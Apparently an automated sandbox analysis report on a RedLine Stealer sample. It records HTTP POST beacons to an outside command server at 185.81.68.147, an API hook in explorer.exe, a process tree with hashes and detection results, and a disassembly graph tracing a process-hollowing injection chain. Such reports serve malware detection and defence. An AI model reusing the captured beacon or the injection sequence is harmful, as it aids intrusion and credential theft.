                                                                                                                                                                                                                                Dec 16, 2024 10:44:43.939480066 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:45.483270884 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:44 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                61192.168.2.1050033185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:45.710473061 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:45.830466032 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:47.363193035 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:46 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                62192.168.2.1050037185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:47.602068901 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:47.722359896 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:49.212102890 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:48 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Code Manipulations

                                                                                                                                                                                                                                User Modules

                                                                                                                                                                                                                                Hook Summary

                                                                                                                                                                                                                                Function NameHook TypeActive in Processes
                                                                                                                                                                                                                                CreateProcessInternalWINLINEexplorer.exe

                                                                                                                                                                                                                                Processes

                                                                                                                                                                                                                                Process: explorer.exe, Module: KERNEL32.DLL
                                                                                                                                                                                                                                Function NameHook TypeNew Data
                                                                                                                                                                                                                                CreateProcessInternalWINLINE0xE9 0x90 0x00 0x07 0x75 0x5E

                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                Start time:04:42:42
                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\m5804Te9Uw.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\m5804Te9Uw.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff7f73e0000
                                                                                                                                                                                                                                File size:309'760 bytes
                                                                                                                                                                                                                                MD5 hash:02701F8D91714C583DECDD43635FF407
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                Start time:04:42:42
                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                Start time:04:42:42
                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6dab80000
                                                                                                                                                                                                                                File size:632'808 bytes
                                                                                                                                                                                                                                MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                Start time:04:42:42
                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff65d6f0000
                                                                                                                                                                                                                                File size:69'632 bytes
                                                                                                                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                Start time:04:42:42
                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                Imagebase:0x7ff609fd0000
                                                                                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000003.1353048341.000000000A4FB000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                Start time:04:42:50
                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exe"
                                                                                                                                                                                                                                Imagebase:0x330000
                                                                                                                                                                                                                                File size:307'712 bytes
                                                                                                                                                                                                                                MD5 hash:7B6730CA4DA283A35C41B831B9567F15
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000000.1356438297.0000000000332000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1565155068.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exe, Author: Joe Security
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                Start time:04:42:54
                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                File size:309'760 bytes
                                                                                                                                                                                                                                MD5 hash:02701F8D91714C583DECDD43635FF407
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 55%, ReversingLabs
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                Start time:04:42:54
                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                Start time:04:42:54
                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6dab80000
                                                                                                                                                                                                                                File size:632'808 bytes
                                                                                                                                                                                                                                MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                Start time:04:42:54
                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff65d6f0000
                                                                                                                                                                                                                                File size:69'632 bytes
                                                                                                                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                Start time:04:43:01
                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff79dad0000
                                                                                                                                                                                                                                File size:5'915'952 bytes
                                                                                                                                                                                                                                MD5 hash:BB0BE25BDD2121FA0BDDF6AC59D4FA8D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                • Detection: 33%, ReversingLabs
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                Start time:04:43:02
                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff79dad0000
                                                                                                                                                                                                                                File size:5'915'952 bytes
                                                                                                                                                                                                                                MD5 hash:BB0BE25BDD2121FA0BDDF6AC59D4FA8D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                Start time:04:43:02
                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff72a020000
                                                                                                                                                                                                                                File size:309'760 bytes
                                                                                                                                                                                                                                MD5 hash:02701F8D91714C583DECDD43635FF407
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                Start time:04:43:03
                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                Start time:04:43:03
                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6dab80000
                                                                                                                                                                                                                                File size:632'808 bytes
                                                                                                                                                                                                                                MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                Start time:04:43:03
                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff65d6f0000
                                                                                                                                                                                                                                File size:69'632 bytes
                                                                                                                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:43.2%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:50%
                                                                                                                                                                                                                                  Total number of Nodes:480
                                                                                                                                                                                                                                  Total number of Limit Nodes:11
                                                                                                                                                                                                                                  execution_graph 833 7ff7f73e3364 836 7ff7f73e24d4 GetModuleFileNameW 833->836 837 7ff7f73e2555 836->837 846 7ff7f73e2550 836->846 838 7ff7f73e2593 837->838 839 7ff7f73e25a9 837->839 840 7ff7f73e259d 838->840 841 7ff7f73e25c7 838->841 879 7ff7f73e2414 ExpandEnvironmentStringsW 839->879 840->846 881 7ff7f73e2494 ExpandEnvironmentStringsW 840->881 880 7ff7f73e2454 ExpandEnvironmentStringsW 841->880 843 7ff7f73e25be 843->846 847 7ff7f73e2619 CreateProcessW 843->847 847->846 848 7ff7f73e2674 CreateFileW 847->848 848->846 849 7ff7f73e26bb GetFileSize 848->849 850 7ff7f73e26e3 CloseHandle 849->850 851 7ff7f73e26d9 849->851 850->846 851->850 852 7ff7f73e26f3 VirtualAlloc 851->852 853 7ff7f73e272d ReadFile 852->853 854 7ff7f73e271d CloseHandle 852->854 855 7ff7f73e277d CloseHandle GetThreadContext 853->855 856 7ff7f73e275a VirtualFree CloseHandle 853->856 854->846 857 7ff7f73e27e5 ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 855->857 858 7ff7f73e27cd VirtualFree 855->858 856->846 859 7ff7f73e2884 VirtualAllocEx 857->859 860 7ff7f73e286c VirtualFree 857->860 858->846 861 7ff7f73e28ef VirtualFree 859->861 862 7ff7f73e2907 WriteProcessMemory 859->862 860->846 861->846 863 7ff7f73e293d VirtualFree 862->863 866 7ff7f73e2955 862->866 863->846 864 7ff7f73e298b WriteProcessMemory 865 7ff7f73e2a16 VirtualFree 864->865 864->866 865->846 866->864 871 7ff7f73e2a33 866->871 867 7ff7f73e2d24 WriteProcessMemory SetThreadContext 869 7ff7f73e2dbf ResumeThread 867->869 870 7ff7f73e2daa VirtualFree 867->870 868 7ff7f73e2aa5 RtlCompareMemory 868->871 875 7ff7f73e2af8 868->875 872 7ff7f73e2de6 VirtualFree 869->872 873 7ff7f73e2dd1 VirtualFree 869->873 870->846 871->867 871->868 872->846 873->846 874 7ff7f73e2d1f 874->867 875->874 876 7ff7f73e2c28 ReadProcessMemory WriteProcessMemory 875->876 877 7ff7f73e2d15 876->877 878 7ff7f73e2cfd VirtualFree 876->878 877->875 878->846 879->843 880->843 881->843 885 7ff7f73e3414 946 7ff7f73e153c 885->946 890 7ff7f73e3434 1180 7ff7f73e40ac GetCurrentProcess OpenProcessToken 890->1180 891 7ff7f73e342c ExitProcess 895 7ff7f73e344f 896 7ff7f73e3464 895->896 898 7ff7f73e34b3 895->898 897 7ff7f73e41ec 3 API calls 896->897 899 7ff7f73e3470 897->899 900 7ff7f73e3504 898->900 901 7ff7f73e34c8 898->901 902 7ff7f73e3477 899->902 903 7ff7f73e348a ExitProcess 899->903 911 7ff7f73e355a 900->911 912 7ff7f73e3519 900->912 904 7ff7f73e41ec 3 API calls 901->904 905 7ff7f73e41ec 3 API calls 902->905 906 7ff7f73e34d4 904->906 907 7ff7f73e3483 905->907 908 7ff7f73e34e3 906->908 909 7ff7f73e34db ExitProcess 906->909 907->903 910 7ff7f73e3492 907->910 913 7ff7f73e3214 21 API calls 908->913 1214 7ff7f73e32a4 910->1214 1204 7ff7f73e3a3c 911->1204 1195 7ff7f73e41ec CreateMutexA 912->1195 918 7ff7f73e34e8 913->918 923 7ff7f73e34ef Sleep 918->923 924 7ff7f73e34fc ExitProcess 918->924 920 7ff7f73e3497 926 7ff7f73e34ab ExitProcess 920->926 927 7ff7f73e349e Sleep 920->927 921 7ff7f73e3534 1199 7ff7f73e3214 921->1199 922 7ff7f73e352c ExitProcess 923->918 927->920 930 7ff7f73e3539 933 7ff7f73e3540 Sleep 930->933 934 7ff7f73e354d ExitProcess 930->934 931 7ff7f73e35c6 CreateThread CreateThread CreateThread WaitForMultipleObjects ExitProcess 932 7ff7f73e3572 935 7ff7f73e41ec 3 API calls 932->935 933->930 936 7ff7f73e357e 935->936 937 7ff7f73e3585 936->937 938 7ff7f73e3598 ExitProcess 936->938 939 7ff7f73e41ec 3 API calls 937->939 940 7ff7f73e3591 939->940 940->938 941 7ff7f73e35a0 940->941 942 7ff7f73e32a4 44 API calls 941->942 943 7ff7f73e35a5 942->943 944 7ff7f73e35ac Sleep 943->944 945 7ff7f73e35b9 ExitProcess 943->945 944->943 1223 7ff7f73e149c LoadLibraryA GetProcAddress 946->1223 948 7ff7f73e15c6 1224 7ff7f73e149c LoadLibraryA GetProcAddress 948->1224 950 7ff7f73e15e0 1225 7ff7f73e14ec LoadLibraryA GetProcAddress 950->1225 952 7ff7f73e15fa 1226 7ff7f73e14ec LoadLibraryA GetProcAddress 952->1226 954 7ff7f73e1614 1227 7ff7f73e14ec LoadLibraryA GetProcAddress 954->1227 956 7ff7f73e162e 1228 7ff7f73e14ec LoadLibraryA GetProcAddress 956->1228 958 7ff7f73e1648 1229 7ff7f73e14ec LoadLibraryA GetProcAddress 958->1229 960 7ff7f73e1662 1230 7ff7f73e14ec LoadLibraryA GetProcAddress 960->1230 962 7ff7f73e167c 1231 7ff7f73e14ec LoadLibraryA GetProcAddress 962->1231 964 7ff7f73e1696 1232 7ff7f73e14ec LoadLibraryA GetProcAddress 964->1232 966 7ff7f73e16b0 1233 7ff7f73e14ec LoadLibraryA GetProcAddress 966->1233 968 7ff7f73e16ca 1234 7ff7f73e149c LoadLibraryA GetProcAddress 968->1234 970 7ff7f73e16e4 1235 7ff7f73e149c LoadLibraryA GetProcAddress 970->1235 972 7ff7f73e16fe 1236 7ff7f73e149c LoadLibraryA GetProcAddress 972->1236 974 7ff7f73e1718 1237 7ff7f73e149c LoadLibraryA GetProcAddress 974->1237 976 7ff7f73e1732 1238 7ff7f73e14ec LoadLibraryA GetProcAddress 976->1238 978 7ff7f73e174c 1239 7ff7f73e14ec LoadLibraryA GetProcAddress 978->1239 980 7ff7f73e1766 1240 7ff7f73e14ec LoadLibraryA GetProcAddress 980->1240 982 7ff7f73e1780 1241 7ff7f73e14ec LoadLibraryA GetProcAddress 982->1241 984 7ff7f73e179a 1242 7ff7f73e14ec LoadLibraryA GetProcAddress 984->1242 986 7ff7f73e17b4 1243 7ff7f73e14ec LoadLibraryA GetProcAddress 986->1243 988 7ff7f73e17ce 1244 7ff7f73e14ec LoadLibraryA GetProcAddress 988->1244 990 7ff7f73e17e8 1245 7ff7f73e14ec LoadLibraryA GetProcAddress 990->1245 992 7ff7f73e1802 1246 7ff7f73e14ec LoadLibraryA GetProcAddress 992->1246 994 7ff7f73e181c 1247 7ff7f73e14ec LoadLibraryA GetProcAddress 994->1247 996 7ff7f73e1836 1248 7ff7f73e14ec LoadLibraryA GetProcAddress 996->1248 998 7ff7f73e1850 1249 7ff7f73e14ec LoadLibraryA GetProcAddress 998->1249 1000 7ff7f73e186a 1250 7ff7f73e14ec LoadLibraryA GetProcAddress 1000->1250 1002 7ff7f73e1884 1251 7ff7f73e14ec LoadLibraryA GetProcAddress 1002->1251 1004 7ff7f73e189e 1252 7ff7f73e14ec LoadLibraryA GetProcAddress 1004->1252 1006 7ff7f73e18b8 1253 7ff7f73e14ec LoadLibraryA GetProcAddress 1006->1253 1008 7ff7f73e18d2 1254 7ff7f73e14ec LoadLibraryA GetProcAddress 1008->1254 1010 7ff7f73e18ec 1255 7ff7f73e14ec LoadLibraryA GetProcAddress 1010->1255 1012 7ff7f73e1906 1256 7ff7f73e14ec LoadLibraryA GetProcAddress 1012->1256 1014 7ff7f73e1920 1257 7ff7f73e14ec LoadLibraryA GetProcAddress 1014->1257 1016 7ff7f73e193a 1258 7ff7f73e14ec LoadLibraryA GetProcAddress 1016->1258 1018 7ff7f73e1954 1259 7ff7f73e14ec LoadLibraryA GetProcAddress 1018->1259 1020 7ff7f73e196e 1260 7ff7f73e14ec LoadLibraryA GetProcAddress 1020->1260 1022 7ff7f73e1988 1261 7ff7f73e14ec LoadLibraryA GetProcAddress 1022->1261 1024 7ff7f73e19a2 1262 7ff7f73e14ec LoadLibraryA GetProcAddress 1024->1262 1026 7ff7f73e19bc 1263 7ff7f73e14ec LoadLibraryA GetProcAddress 1026->1263 1028 7ff7f73e19d6 1264 7ff7f73e14ec LoadLibraryA GetProcAddress 1028->1264 1030 7ff7f73e19f0 1265 7ff7f73e14ec LoadLibraryA GetProcAddress 1030->1265 1032 7ff7f73e1a0a 1266 7ff7f73e14ec LoadLibraryA GetProcAddress 1032->1266 1034 7ff7f73e1a24 1267 7ff7f73e14ec LoadLibraryA GetProcAddress 1034->1267 1036 7ff7f73e1a3e 1268 7ff7f73e14ec LoadLibraryA GetProcAddress 1036->1268 1038 7ff7f73e1a58 1269 7ff7f73e14ec LoadLibraryA GetProcAddress 1038->1269 1040 7ff7f73e1a72 1270 7ff7f73e14ec LoadLibraryA GetProcAddress 1040->1270 1042 7ff7f73e1a8c 1271 7ff7f73e14ec LoadLibraryA GetProcAddress 1042->1271 1044 7ff7f73e1aa6 1272 7ff7f73e14ec LoadLibraryA GetProcAddress 1044->1272 1046 7ff7f73e1ac0 1273 7ff7f73e14ec LoadLibraryA GetProcAddress 1046->1273 1048 7ff7f73e1ada 1274 7ff7f73e14ec LoadLibraryA GetProcAddress 1048->1274 1050 7ff7f73e1af4 1275 7ff7f73e14ec LoadLibraryA GetProcAddress 1050->1275 1052 7ff7f73e1b0e 1276 7ff7f73e14ec LoadLibraryA GetProcAddress 1052->1276 1054 7ff7f73e1b28 1277 7ff7f73e14ec LoadLibraryA GetProcAddress 1054->1277 1056 7ff7f73e1b42 1278 7ff7f73e14ec LoadLibraryA GetProcAddress 1056->1278 1058 7ff7f73e1b5c 1279 7ff7f73e14ec LoadLibraryA GetProcAddress 1058->1279 1060 7ff7f73e1b76 1280 7ff7f73e14ec LoadLibraryA GetProcAddress 1060->1280 1062 7ff7f73e1b90 1281 7ff7f73e14ec LoadLibraryA GetProcAddress 1062->1281 1064 7ff7f73e1baa 1282 7ff7f73e14ec LoadLibraryA GetProcAddress 1064->1282 1066 7ff7f73e1bc4 1283 7ff7f73e14ec LoadLibraryA GetProcAddress 1066->1283 1068 7ff7f73e1bde 1284 7ff7f73e14ec LoadLibraryA GetProcAddress 1068->1284 1070 7ff7f73e1bf8 1285 7ff7f73e14ec LoadLibraryA GetProcAddress 1070->1285 1072 7ff7f73e1c12 1286 7ff7f73e14ec LoadLibraryA GetProcAddress 1072->1286 1074 7ff7f73e1c2c 1287 7ff7f73e14ec 